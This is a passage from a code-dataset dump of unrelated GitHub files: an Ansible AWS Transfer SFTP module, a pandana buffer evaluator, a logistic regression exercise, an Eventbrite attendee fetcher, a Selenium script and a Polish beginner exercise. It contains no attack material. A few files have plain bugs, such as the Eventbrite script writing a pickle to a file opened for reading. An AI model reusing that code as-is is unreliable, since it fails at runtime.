be buffered.\n expression: pandana, pandas or python expression to evaluate\n zone_df_name : the name of the df in df_dict to which all results\n will be indexed.\n df_dict : dictionary of pandas.DataFrames. This must include the df\n referenced by zone_df_name. A poi_df can be used to find distances\n to other points like bus stops. All poi's should be stored in this\n one df. Other dfs can be used for aggregate buffering such as\n intersections_df.\n locals_dict : Dict\n This is a dictionary of local variables that will be the environment\n for an evaluation of \"python\" expression.\n trace_rows: series or array of bools to use as mask to select target rows to trace\n\n Returns\n -------\n variables : pandas.DataFrame\n Will have the index of `df` and columns named by target and containing\n the result of evaluating expression\n trace_df : pandas.DataFrame or None\n a dataframe containing the eval result values for each assignment expression\n \"\"\"\n\n np_logger = NumpyLogger(logger)\n\n def is_local(target):\n return target.startswith('_') and target.isupper()\n\n def is_temp(target):\n return target.startswith('_')\n\n def to_series(x, target=None):\n if x is None or np.isscalar(x):\n if target:\n logger.warn(\"WARNING: assign_variables promoting scalar %s to series\" % target)\n x = pd.Series([x] * len(locals_dict[zone_df_name].index),\n index=locals_dict[zone_df_name].index)\n if not isinstance(x, pd.Series):\n x = pd.Series(x)\n x.name = target\n\n return x\n\n trace_assigned_locals = trace_results = None\n if trace_rows is not None:\n # convert to numpy array so we can slice ndarrays as well as series\n trace_rows = np.asanyarray(trace_rows)\n if trace_rows.any():\n trace_results = []\n trace_assigned_locals = {}\n\n # avoid touching caller's passed-in locals_d parameter (they may be looping)\n locals_dict = locals_dict.copy() if locals_dict is not None else {}\n local_keys = list(locals_dict.keys())\n\n le = []\n traceable = True\n # need to be able to identify which variables causes an error, which keeps\n # this from being expressed more parsimoniously\n for e in zip(buffer_expressions.target, buffer_expressions.variable,\n buffer_expressions.target_df, buffer_expressions.expression):\n target, var, target_df, expression = e\n\n if target in local_keys:\n logger.warn(\"buffer_variables target obscures local_d name '%s'\" % str(target))\n\n if is_local(target):\n\n x = eval(expression, globals(), locals_dict)\n locals_dict[target] = x\n if trace_assigned_locals is not None:\n trace_assigned_locals[target] = x\n continue\n\n try:\n\n # FIXME - log any numpy warnings/errors but don't raise\n np_logger.target = str(target)\n np_logger.expression = str(expression)\n saved_handler = np.seterrcall(np_logger)\n save_err = np.seterr(all='log')\n\n network = locals_dict['network']\n logger.debug(\"solving expression: %s\" % target)\n\n # aggregate query\n if 'aggregate' in expression:\n network.set(locals_dict[target_df][locals_dict['node_id']],\n variable=locals_dict[target_df][var], name=var)\n values = to_series(eval(expression, globals(), locals_dict), target=target)\n # index results to the zone_df:\n locals_dict[zone_df_name][target] = \\\n values.loc[locals_dict[zone_df_name][locals_dict['node_id']]].values\n values = locals_dict[zone_df_name][target]\n traceable = True\n\n # nearest poi\n elif 'nearest_pois' in expression:\n # records we want to run nearest poi on should have a value of 1.\n # Ex- Could have a table of transit stops,\n # where each column is a type of transit stop, e.g. light rail, and a\n # value of 1 in the light rail column\n # means that that stop is a light rail stop.\n temp_df = locals_dict[target_df][(locals_dict[target_df][var] == 1)]\n\n if not temp_df.empty:\n network.set_pois(category=var,\n maxdist=locals_dict['max_dist'],\n maxitems=locals_dict['max_pois'],\n x_col=temp_df[locals_dict['poi_x']],\n y_col=temp_df[locals_dict['poi_y']])\n # poi queries return a df, no need to put through to_series function.\n values = eval(expression, globals(), locals_dict)\n # index results to the zone_df:\n locals_dict[zone_df_name][target] = \\\n values.loc[locals_dict[zone_df_name][locals_dict['node_id']]].values\n else:\n locals_dict[zone_df_name][target] = 999\n\n values = locals_dict[zone_df_name][target]\n # if assignment is to a df that is not the zone df, then cannot trace results\n if target_df != zone_df_name:\n traceable = False\n\n # panda df assignment:\n else:\n values = to_series(eval(expression, globals(), locals_dict), target=target)\n values.index = locals_dict[target_df].index # must be the same df as in expression\n # the target_df might need this column for a subsequent buffer operation\n # delete if exists:\n if target in locals_dict[target_df].columns:\n locals_dict[target_df].drop(target, 1, inplace=True)\n locals_dict[target_df] = locals_dict[target_df].merge(pd.DataFrame(\n values), how='left', left_index=True, right_index=True)\n # if assignment is to a df that is not the zone df, then cannot trace results\n if target_df != zone_df_name:\n traceable = False\n\n np.seterr(**save_err)\n np.seterrcall(saved_handler)\n\n except Exception as err:\n logger.error(\"assign_variables error: %s: %s\" % (type(err).__name__, str(err)))\n\n logger.error(\"assign_variables expression: %s = %s\"\n % (str(target), str(expression)))\n\n # values = to_series(None, target=target)\n raise err\n\n le.append((target, values))\n\n if trace_results is not None:\n # some calcs are not included in the final df so may not have the\n # zones that being traced. These should have a value of 'None' in\n # spec under the 'variable' column.\n if traceable:\n trace_results.append((target, values[trace_rows]))\n\n # update locals to allows us to ref previously assigned targets\n locals_dict[target] = values\n\n # build a dataframe of eval results for non-temp targets\n # since we allow targets to be recycled, we want to only keep the last usage\n # we scan through targets in reverse order and add them to the front of the list\n # the first time we see them so they end up in execution order\n variables = []\n seen = set()\n for statement in reversed(le):\n # statement is a tuple (, )\n target_name = statement[0]\n if not is_temp(target_name) and target_name not in seen:\n variables.insert(0, statement)\n seen.add(target_name)\n\n # DataFrame from list of tuples [, ), ...]\n variables = pd.DataFrame.from_dict(dict(variables))\n if trace_results is not None:\n trace_results = pd.DataFrame.from_dict(dict(trace_results))\n trace_results.index = locals_dict[zone_df_name][trace_rows].index\n trace_results = undupe_column_names(trace_results)\n\n # add df columns to trace_results\n # trace_results = pd.concat([locals_dict[zone_df_name], trace_results], axis=1)\n return variables, trace_results, trace_assigned_locals\n","repo_name":"RSGInc/netbuffer","sub_path":"netbuffer/core/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":14046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21765493373","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = '''\n---\nmodule: transfer\nshort_description: Manage SFTP Severs in AWS.\ndescription:\n - Manage SFTP Servers in AWS Using AWS Transfer Service.\nversion_added: \"2.4\"\nrequirements: [ boto3, pydash ]\nauthor: \"Mark J. Horninger(@spam-n-eggs); Dominion Solutions LLC (@dominion-solutions); TAPP Network, LLC (@TappNetwork)\"\noptions:\n name:\n description:\n - Fully Qualified Domain name of the SFTP Server to create\n required: true\n type: str\n state:\n description:\n - Create or remove the SFTP Server\n - Present will also execute an update if necessary.\n required: false\n default: present\n choices: [ 'present', 'absent', 'add_user', 'remove_user' ]\n type: str\n tags:\n description:\n - tags dict to apply to the server\n type: dict\n purge_tags:\n description:\n - whether to remove tags that aren't present in the C(tags) parameter\n type: bool\n default: True\n endpoint_type:\n description:\n - The type of endpoint to be used.\n type: str\n choices: ['PUBLIC', 'VPC_ENDPOINT']\n default: 'PUBLIC'\n identity_provider_type:\n description:\n - The identity provider type.\n type: str\n choices: ['SERVICE_MANAGED', 'API_GATEWAY']\n default: 'SERVICE_MANAGED'\n user_home_directory_type:\n description:\n - The Type of directory that the user is mapped to.\n type: str\n choices: ['PATH', 'LOGICAL']\n user_home_directory:\n description:\n - The location of the directory for the user home directory.\n type: str\n default: '/'\n user_home_directory_mappings:\n description:\n - Mappings for the user home directory on S3 to the local filesystem on the SFTP server.\n type: dict\n user_name:\n description:\n - The user name to create an account on the SFTP Server for.\n type: str\n user_policy:\n description:\n - A JSON-Formatted policy to limit the user, if needed.\n type: str\n user_role:\n description:\n - The ARN that points to the role that the user should assume. This role should have access to the S3 Bucket.\n type: str\n user_ssh_public_key_body:\n description:\n - The body of the public key that will be used (if pre-generated) to access the SFTP Server.\n type: str\n user_tags:\n description:\n - Tags that should be associated with the user when created.\n type: list\n host_key:\n description:\n - The SSH-keygen generated key for this particular host.\n - It is not recommended to manage your own SSH keys for sftp hosts, but it is provided as a convenience for migration.\n type: str\n identity_provider_role:\n description:\n - The role parameter provides the type of role used to authenticate the user account.\n - Length Constraints - Minimum length of 20. Maximum length of 2048.\n - 'Pattern:: arn::.*role/.*'\n type: str\n identity_provider_url:\n description:\n - The Url parameter provides contains the location of the service endpoint used to authenticate users.\n - Length Constraints - Maximum length of 255.\n type: str\n logging_role:\n description:\n - A value that allows the service to write your SFTP users' activity to your Amazon CloudWatch logs for monitoring and auditing purposes.\n - Length Constraints - Minimum length of 20. Maximum length of 2048.\n - 'Pattern:: arn::.*role/.*'\n type: str\n transfer_endpoint_url:\n description:\n - The URL for the transfer endpoint.\n type: str\n vpc_id:\n description:\n - the VPC to place the created SFTP server into.\n type: str\nextends_documentation_fragment:\n - aws\n - ec2\nnotes:\n - If C(requestPayment), C(policy), C(tagging) or C(versioning)\n operations/API aren't implemented by the endpoint, module doesn't fail\n if related parameters I(requester_pays), I(policy), I(tags) or\n I(versioning) are C(None).\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n'''\n\n\nfrom ansible.module_utils.basic import to_text\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils.ec2 import ec2_argument_spec, AWSRetry, boto3_tag_list_to_ansible_dict, \\\n ansible_dict_to_boto3_tag_list\ntry:\n import boto3\n from pydash import py_\n from botocore.exceptions import BotoCoreError, ClientError, EndpointConnectionError, WaiterError\nexcept ImportError:\n pass # handled by AnsibleAWSModule\n\nSERVER_NAME_KEY = 'aws:transfer:customHostname'\n\nfrom ansible.module_utils.ec2 import get_aws_connection_info\ntry:\n import boto3\nexcept ImportError:\n # Pass it to the AnsibleAWSModule\n pass\n\n\ndef create_or_update_sftp(client, module):\n name = module.params.get(\"name\")\n purge_tags = module.params.get(\"purge_tags\")\n tags = {}\n if module.params.get(\"tags\") is not None:\n tags = module.params.get(\"tags\")\n endpoint_type = module.params.get(\"endpoint_type\")\n vpc_id = module.params.get(\"vpc_id\")\n host_key = module.params.get(\"host_key\")\n identity_provider_type = module.params.get(\"identity_provider_type\")\n identity_provider_role = module.params.get(\"identity_provider_role\")\n identity_provider_url = module.params.get(\"identity_provider_url\")\n logging_role = module.params.get(\"logging_role\")\n changed = False\n result = {}\n sftp_server = None\n needs_creation = False\n\n # TODO: Eventually, this needs to support all of the endpoint details, including vpc endpoint ids.\n endpoint_details = None\n if endpoint_type != 'PUBLIC' and vpc_id is not None:\n endpoint_details = {\n # \"AddressAllocationIds\": [],\n # \"SubnetIds\": [],\n # \"VpcEndpointId\": \"\",\n \"VpcId\": vpc_id\n }\n\n identity_provider_details = None\n if identity_provider_url is not None and identity_provider_role is not None:\n identity_provider_details = {\n \"InvocationRole\": identity_provider_role,\n \"Url\": identity_provider_url\n }\n\n name_tag = {'Key': SERVER_NAME_KEY, 'Value': name}\n assigned_tags = [name_tag]\n\n try:\n sftp_server = find_sftp_server(client, name)\n needs_creation = sftp_server is None\n except EndpointConnectionError as e:\n module.fail_json_aws(e, msg=\"Invalid endpoint provided: %s\" % to_text(e))\n except (BotoCoreError, ClientError) as e:\n module.fail_json_aws(e, msg=\"Failed to check Transfer presence\")\n if needs_creation:\n result = create_sftp_server(client, endpoint_details, endpoint_type, host_key,\n identity_provider_details, identity_provider_type, logging_role, name_tag)\n sftp_server_id = result['ServerId']\n changed = True\n else:\n sftp_server_id = sftp_server['Server']['ServerId']\n if not purge_tags:\n assigned_tags = sftp_server['Tags']\n # Update SFTP Server Details\n # Update Tags\n for key, value in tags.items():\n item = py_.find(assigned_tags, {'Key': key})\n if item:\n item['Value'] = value\n else:\n item = {'Key': key, 'Value': value}\n assigned_tags.append(item)\n update_args = build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details,\n identity_provider_type, logging_role, name, sftp_server_id, is_update=True)\n\n result = client.update_server(**update_args)\n changed = True\n\n module.exit_json(changed=changed, name=name, **result)\n\n\ndef find_sftp_server(client, server_name):\n # Finding a server by name is a little more complicated than I originally expected. Rather than wasting resources\n # it's much easier to just go find it and then check if the return value of this method is None.\n # Load all of the server IDs in the account\n all_server_ids = py_.map(client.list_servers()['Servers'], 'ServerId')\n all_servers = py_.map_(all_server_ids, (lambda server_id: client.describe_server(ServerId=server_id)))\n host = py_.find(all_servers, {'Server': {'Tags': [{'Key': SERVER_NAME_KEY, 'Value': server_name}]}})\n return host\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef create_sftp_server(client, endpoint_details, endpoint_type, host_key,\n identity_provider_details, identity_provider_type, logging_role, name):\n \"\"\"\n Does the work of actually creating the SFTP Server.\n :arg client: boto3.session.Session the boto3 client that is used to create the connection\n :arg endpoint_details: object The details that are provided to the endpoint - right now vpc_id is the only supported\n information.\n :arg endpoint_type: str The type of endpoint that the created SFTP Server connects to. AWS Supports PUBLIC, VPC and\n VPC_ENDPOINT\n :arg host_key: str This is the generated ssh key for the host, the result of ssh-keygen. Do not use this unless you\n are transitioning from another SFTP Server and need to maintain backward compatibility.\n :arg identity_provider_details: object The information for the provided entity type.\n See https://docs.aws.amazon.com/transfer/latest/userguide/API_IdentityProviderDetails.html for more details.\n :arg identity_provider_type: str Currently supports SERVICE_MANAGED or API_GATEWAY - if using API_GATEWAY,\n identity_provider_details becomes required. SERVICE_MANAGED is the default, and allows AWS to manage the SFTP\n server.\n :arg logging_role: str A value that allows the service to write your SFTP users' activity to your Amazon CloudWatch\n logs for monitoring and auditing purposes.\n :arg name: dict The name of the SFTP server that also becomes the FQDN of it, in tag format.\n :rtype: dict A Single Entry Dictionary that contains the Server ID.\n \"\"\"\n kwargDict = build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details,\n identity_provider_type, logging_role, name)\n\n response = client.create_server(**kwargDict)\n # According to the documentation response should be an object containing a single string like this:\n # {\n # ServerId: 'string(19)'\n # }\n return response\n\n\ndef build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details, identity_provider_type,\n logging_role, name, server_id=None, is_update=False):\n kwarg_dict = {}\n if not is_update:\n kwarg_dict['Tags'] = [name]\n if endpoint_details is not None:\n kwarg_dict['EndpointDetails'] = endpoint_details\n if endpoint_type is not None:\n kwarg_dict['EndpointType'] = endpoint_type\n if host_key is not None:\n kwarg_dict['HostKey'] = host_key\n if identity_provider_details is not None:\n kwarg_dict['IdentityProviderDetails'] = identity_provider_details\n if identity_provider_type is not None and not is_update:\n kwarg_dict['IdentityProviderType'] = identity_provider_type\n if logging_role is not None:\n kwarg_dict['LoggingRole'] = logging_role\n if server_id is not None:\n kwarg_dict['ServerId'] = server_id\n return kwarg_dict\n\n\ndef add_sftp_users(client, module):\n changed = False\n user_name = module.params.get('user_name')\n user_home_directory = module.params.get('user_home_directory')\n user_home_directory_type = module.params.get('user_home_directory_type')\n user_home_directory_mappings = module.params.get('user_home_directory_mappings')\n user_policy = module.params.get('user_policy')\n user_role = module.params.get('user_role')\n user_ssh_public_key_body = module.params.get('user_ssh_public_key_body')\n user_tags = module.params.get('user_tags')\n name = module.params.get('name')\n\n result = add_user(client, user_name, user_home_directory, user_home_directory_type, user_home_directory_mappings,\n user_policy, user_role, user_ssh_public_key_body, user_tags, name)\n changed = True\n module.exit_json(changed=changed, **result)\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef add_user(client, user_name, user_home_directory, user_home_directory_type,\n user_home_directory_mappings, user_policy, user_role, user_ssh_public_key_body, user_tags, name):\n result = {}\n sftp_server = find_sftp_server(client, name)\n exists = False\n if sftp_server is not None:\n sftp_server_id = sftp_server['Server']['ServerId']\n users = client.list_users(\n ServerId=sftp_server_id\n )\n\n if users is not None:\n exists = (py_.find_index(users['Users'], {\"UserName\": user_name}) != -1)\n\n add_user_kwargs = dict(\n Role=user_role,\n ServerId=sftp_server_id,\n UserName=user_name\n )\n\n if user_home_directory is not None:\n add_user_kwargs['HomeDirectory'] = user_home_directory\n if user_home_directory_type is not None:\n add_user_kwargs['HomeDirectoryType'] = user_home_directory_type\n if user_home_directory_mappings is not None:\n add_user_kwargs['HomeDirectoryMappings'] = user_home_directory_mappings\n if user_policy is not None:\n add_user_kwargs['Policy'] = user_policy\n if user_ssh_public_key_body is not None:\n add_user_kwargs['SshPublicKeyBody'] = user_ssh_public_key_body\n if user_tags is not None:\n add_user_kwargs['Tags'] = user_tags\n\n if not exists:\n result = client.create_user(**add_user_kwargs)\n else:\n result = client.update_user(**add_user_kwargs)\n\n return result\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef destroy_sftp_server(client, module):\n name = module.params.get('name')\n sftp_server = find_sftp_server(client, name)\n changed = False\n if sftp_server is not None:\n sftp_server_id = sftp_server['Server']['ServerId']\n response = client.delete_server(ServerId=sftp_server_id)\n changed = True\n module.exit_json(changed=changed, name=name, **response)\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef destroy_sftp_users(client, module):\n changed = False\n response = dict()\n name = module.params.get('name')\n user_name = module.params.get('user_name')\n sftp_server_id = get_sftp_server_id(client, name)\n response = client.delete_user(ServerId=sftp_server_id, UserName=user_name)\n changed = True\n\n module.exit_json(changed=changed, name=name, **response)\n\n\ndef get_sftp_server_id(client, name):\n sftp_server = find_sftp_server(client, name)\n sftp_server_id = sftp_server['Server']['ServerId']\n return sftp_server_id\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(\n dict(\n name=dict(required=True),\n state=dict(default='present', choices=['present', 'absent', 'add_user', 'remove_user']),\n tags=dict(type='dict'),\n purge_tags=dict(type='bool', default=True),\n # Default to public because AWS does. This is probably not the best option.\n endpoint_type=dict(default=\"PUBLIC\", choices=['PUBLIC', 'VPC_ENDPOINT']),\n vpc_id=dict(required=False),\n host_key=dict(),\n identity_provider_type=dict(default='SERVICE_MANAGED', choices=['SERVICE_MANAGED', 'API_GATEWAY']),\n identity_provider_role=dict(),\n identity_provider_url=dict(),\n transfer_endpoint_url=dict(),\n logging_role=dict(),\n user_name=dict(type='str'),\n user_home_directory=dict(type='str', default='/'),\n user_home_directory_type=dict(type='str', choices=['PATH', 'LOGICAL']),\n user_home_directory_mappings=dict(type='dict'),\n user_policy=dict(type='str'),\n user_role=dict(type='str'),\n user_ssh_public_key_body=dict(type='str'),\n user_tags=dict(type='list'),\n )\n )\n\n module = AnsibleAWSModule(\n argument_spec=argument_spec,\n )\n\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n\n if region in ('us-east-1', '', None):\n # default to US Standard region\n location = 'us-east-1'\n else:\n # Boto uses symbolic names for locations but region strings will\n # actually work fine for everything except us-east-1 (US Standard)\n location = region\n\n # Get AWS connection information.\n endpoint_url = module.params.get('transfer_endpoint_url')\n aws_access_token = aws_connect_kwargs.get('aws_access_key_id')\n aws_secret_key = aws_connect_kwargs.get('aws_secret_access_key')\n aws_session_token = aws_connect_kwargs.get('security_token')\n\n state = module.params.get(\"state\")\n\n transfer_client = boto3.client(service_name='transfer', region_name=region, endpoint_url=endpoint_url,\n aws_access_key_id=aws_access_token, aws_secret_access_key=aws_secret_key,\n aws_session_token=aws_session_token)\n\n if state == 'present':\n create_or_update_sftp(transfer_client, module)\n elif state == 'absent':\n destroy_sftp_server(transfer_client, module)\n elif state == 'add_user':\n add_sftp_users(transfer_client, module)\n elif state == 'remove_user':\n destroy_sftp_users(transfer_client, module)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"spam-n-eggs/ansible-aws-transfer","sub_path":"ansible_collections/tapp/amazon/plugins/modules/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":17434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17499610670","text":"import pylab as pl\nimport numpy as np\nfrom math import exp, log\n\n# Función para hallar y estimado\ndef yEstimado(m, x, b):\n return 1 / (1+ exp(-(m * x + b)))\n\n# Función Entropía Binaria Cruzada\ndef binaryCrossEntropy(m, X, b, Y):\n sum = 0\n for i in range(len(X)):\n sum += Y[i] * log(yEstimado(m, X[i], b)) + (1 - Y[i]) * log(1 - yEstimado(m, X[i], b))\n return sum * (-1)\n\n# Función para hallar la derivada \n# en cuanto a la pendiente e intercepto\ndef gradient(y, x, m, b, opc):\n # slope\n if opc == 0:\n return (yEstimado(m, x, b) - y) * x\n # intercept\n elif opc == 1:\n return (yEstimado(m, x, b) - y)\n\n# Función para probar los datos de prueba\ndef test(testX, testY, m, b, umbral):\n c = 0\n cad = \"Test\" +'\\n'\n for i in range(len(testX)):\n if yEstimado(m, testX[i], b) >= umbral and testY[i] == 1:\n cad += \"Primer dato \"+str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \"+str(testY[i])+\", Correcto\" + '\\n'\n c+=1\n elif yEstimado(m, testX[i], b) < umbral and testY[i] == 0:\n cad += \"Primer dato \"+ str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \" +str(testY[i])+\", Correcto\" + '\\n'\n c+=1\n else:\n cad +=\"Primer dato \"+str(testX[i])+\" = \"+str(yEstimado(m, testX[i], b))+\", aprobado estimado = \"+str(testY[i])+\", Incorrecto\" + '\\n'\n cad += \"Porcentaje de Acierto: \"+ str((c * 100)/len(testX))+'%' + '\\n'\n return cad\n\n# Función para graficar\ndef plot(m, b, X, Y):\n pl.scatter(X,Y)\n x_real = np.arange(min(X)-1, max(X), 0.1)\n y_real = []\n for i in range(len(x_real)):\n y_real.append(yEstimado(m, x_real[i], b))\n pl.plot(x_real, y_real, color='yellowgreen')\n pl.show()\n\n# Función para mostrar los arreglos\ndef show(a):\n cad = \"x = {\"\n for i in range(len(a)):\n cad += str(a[i]) \n if i != len(a)-1: cad += \",\"\n cad += \"}\"\n return cad\n\n# Función principal de regresión logistica\ndef logisticRegression(X, Y, testX, testY, trainX, trainY, m, b, iterations, tasa, umbral):\n cad = \"\"\n for i in range(iterations):\n dm = 0\n db = 0\n cad += \"Iteración \" + str(i+1) +'\\n'\n cad += \"Pendiente Anterior = \" + str(round(m,6)) +'\\n'\n cad += \"Intercepto Anterior = \" + str(round(b,6)) +'\\n'\n error = binaryCrossEntropy(m, trainX, b, trainY)\n cad += \"Error = \" + str(round(error,6)) +'\\n'\n cad += \"Tasa de aprendizaje = \"+ str(tasa) +'\\n'\n for i in range(len(trainX)):\n dm += gradient(trainY[i], trainX[i], m, b, 0)\n db += gradient(trainY[i], trainX[i], m, b, 1)\n cad += \"Derivada pendiente = \" + str(round(dm,6)) +'\\n'\n cad += \"Derivada intercepto = \" + str(round(db,6)) +'\\n'\n m = m - tasa * dm\n b = b - tasa * db\n cad += \"Pendiente nueva = \" + str(round(m,4)) +'\\n'\n cad += \"Intercepto nuevo = \" + str(round(b,4)) +'\\n'\n cad += '\\n'\n cad += test(testX, testY, m, b, umbral) +'\\n'\n plot(m, b, X, Y)\n return cad\n\nif __name__ == \"__main__\":\n X = [5, 7, 2, 13, 4, 15, 9, 4, 6, 1, 3, 10, 4, 10, 8, 20, 18, 15, 20, 12, 6, 12, 13, 14, 10, 6, 21, 25]\n Y = [0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1]\n umbral = 0.5\n trainX = [5, 7, 2, 13, 4, 15, 9, 4, 6, 1, 3, 10, 4, 10, 8, 20, 18, 15, 20, 12, 6, 12]\n trainY = [0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1]\n testX = [13, 14, 10, 6, 21, 25]\n testY = [1, 1, 1, 0, 1, 1]\n # pendiente\n m = -0.9874\n # intercepto\n b = -2.1789\n # tasa de aprendizaje\n tasa = 0.001\n # nro de iteraciones\n iterations = 100000\n cad = \"Sharon Chullunquía Rosas\" + '\\n'\n cad += \"Pendiente anterior = \" + str(m) + '\\n'\n cad += \"Intercepto anterior = \" + str(b) + '\\n'\n cad += \"Tasa de aprendizaje = \" + str(tasa) + '\\n'\n cad += \"Cantidad de iteraciones = \" + str(iterations) + '\\n'\n cad += \"Umbral = \" + str(umbral) + '\\n'\n cad += \"Datos de Entrenamiento:\" + '\\n'\n cad += show(trainX) + '\\n'\n cad += show(trainY) + '\\n'\n cad += \"Datos de Test:\" + '\\n'\n cad += show(testX) + '\\n'\n cad += show(testY) + '\\n'\n cad += '\\n'\n\n cad += logisticRegression(X, Y, testX, testY, trainX, trainY, m, b, iterations, tasa, umbral)\n with open('regresion-logistica.txt', 'w') as fileName:\n fileName.write(cad)","repo_name":"sharon1160/IA","sub_path":"Laboratories/Laboratorio_05/regresion_logistica.py","file_name":"regresion_logistica.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14861148421","text":"\"\"\"Eventbrite API\n\nUsage:\nCurrent attendees are saved in 'attendees.db'\n\"\"\"\nimport cStringIO\nimport json\nimport pickle\nimport pycurl\n\nc = pycurl.Curl()\n\nPERSONAL_TOKEN = ''\nEVENTBRITE_EVENT_ID = ''\nassert PERSONAL_TOKEN != '', 'Please provide a PERSONAL_TOKEN'\nassert EVENTBRITE_EVENT_ID != '', 'Please provide a EVENTBRITE_EVENT_ID'\n\ndef get_current_attendees():\n try:\n attendees = pickle.load(open(\"attendees.db\", \"rb\"))\n except IOError:\n attendees = {'attendees':[]}\n pickle.dump(attendees, open(\"attendees.db\", \"rb\"))\n return attendees['attendees']\n\ndef set_current_attendees(attendee_list):\n attendee_dict = {'attendees': attendee_list}\n pickle.dump(attendee_dict, open(\"attendees.db\", \"wb\"))\n\ndef get_new_attendees():\n curr = get_current_attendees()\n all_attendees_info = get_eventbrite_attendees()\n all_attendees = [user['profile']['company'] for user in all_attendees_info]\n if not curr:\n return all_attendees\n if not all_attendees:\n return []\n return list(set(all_attendees) - set(curr))\n\ndef get_eventbrite_attendees():\n buf = cStringIO.StringIO()\n url = \"https://www.eventbriteapi.com/v3/events/{0}/attendees/?token={1}\".format(EVENTBRITE_EVENT_ID, PERSONAL_TOKEN)\n c.setopt(c.URL, url)\n c.setopt(c.WRITEFUNCTION, buf.write)\n c.perform()\n jsonBuf = json.loads(buf.getvalue())\n return jsonBuf['attendees']\n\ndef get_all_attendees():\n curr = get_current_attendees()\n new = get_new_attendees()\n if not curr:\n return new\n curr.extend(new)\n return curr\n\ndef get_and_set_new_attendees():\n new = get_new_attendees()\n set_current_attendees(get_all_attendees())\n return new\n\ndef main():\n pass\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JamshedVesuna/StartupFairTweeting","sub_path":"eventbrite.py","file_name":"eventbrite.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33214682172","text":"#! python3\n# sendKeysSelenium.py - Opens Gamil and send keys to the input field\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://nostarch.com')\n\nhtmlElem = browser.find_element_by_tag_name('html')\nhtmlElem.send_keys(Keys.END) #scroll to botton\nhtmlElem.send_keys(Keys.TOP) #scroll to top","repo_name":"aa-ahmed-aa/automate-boring-stuff","sub_path":"sendKeysSelenium.py","file_name":"sendKeysSelenium.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36018428777","text":"# Napisz program sprawdzający wymagania potencjalnego kandydata na programistę\n# 1) Dodaj zmienną experience z wartością 2, kolejną languages z listą elementów:\n# \"python\", \"typescript\", \"javascript\", \"java\"\n# Ostatnią zmienną będzie contractType o wartości \"b2b\" jaką chce kandydat\n# 2) Wykorzystaj instrukcję if z operatorem and do sprawdzenia czy\n# doświadczenie kandydata to dwa lub więcej lat oraz czy zna język python\n# i java. Pamiętaj o wykorzystaniu operatora in do sprawdzenia czy\n# wartość jest w liście\n# 3) Jeśli powyższe warunki są spełnione zrób kolejny if i sprawdź czy\n# typ kontraktu jest \"b2b\" lub \"employment\", pamiętaj o użyciu operatora or.\n# Zaprezentuj w terminalu informację że kandydat jest przyjęty, gdy warunki\n# są spełnione.\n# 4) W przypadku, gdy warunki w if nie są spełnione pokaż w konsoli po else\n# odpowiednią informację\n\n\nexperience = 2\nlanguages = [\"python\", \"typescript\", \"javascript\", \"java\"]\ncontractType = \"b2b\"\n\nif experience >= 2 and \"python\" in languages and \"java\" in languages:\n if contractType == \"b2b\" or contractType == \"employment\":\n print(\"kandydat przyjęty\")\n else:\n print(\"kandydat nieprzyjęty\")\nelse:\n print(\"kandydat nie spełnia podstawowych warunków\")\n","repo_name":"rajchelm/python-academy","sub_path":"ud/Chalenges/candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333677144","text":"import logging\nfrom monplugin import Check,Status\nfrom netapp_ontap.resources import Disk,Software\nfrom netapp_ontap.error import NetAppRestError\nfrom ..tools import cli\nfrom ..tools.helper import setup_connection,item_filter,severity,compareVersion\nimport re\n\n__cmd__ = \"disk-health\"\n\"\"\"\nDisk({\n 'rpm': 7200,\n 'node': {\n 'uuid': 'f3a35903-68ae-11e8-8898-4b3d2df62ccf',\n 'name': 'acme01',\n '_links': {'self': {'href': '/api/cluster/nodes/f3a35903-68ae-11e8-8898-4b3d2df62ccf'}}\n },\n 'shelf': {'uid': '4713285323093248592'},\n 'fips_certified': False,\n 'aggregates': [{\n 'uuid': 'fa49074c-5d93-4e5d-8d36-332226fcbe91',\n 'name': 'aggr0_acme01',\n '_links': {'self': {'href': '/api/storage/aggregates/fa49074c-5d93-4e5d-8d36-332226fcbe91'}}\n },\n {'uuid': '97e37d61-23b0-4917-85c8-ae9d5354bba5',\n 'name': 'aggr1_acme01',\n '_links': {'self': {'href': '/api/storage/aggregates/97e37d61-23b0-4917-85c8-ae9d5354bba5'}}\n }],\n 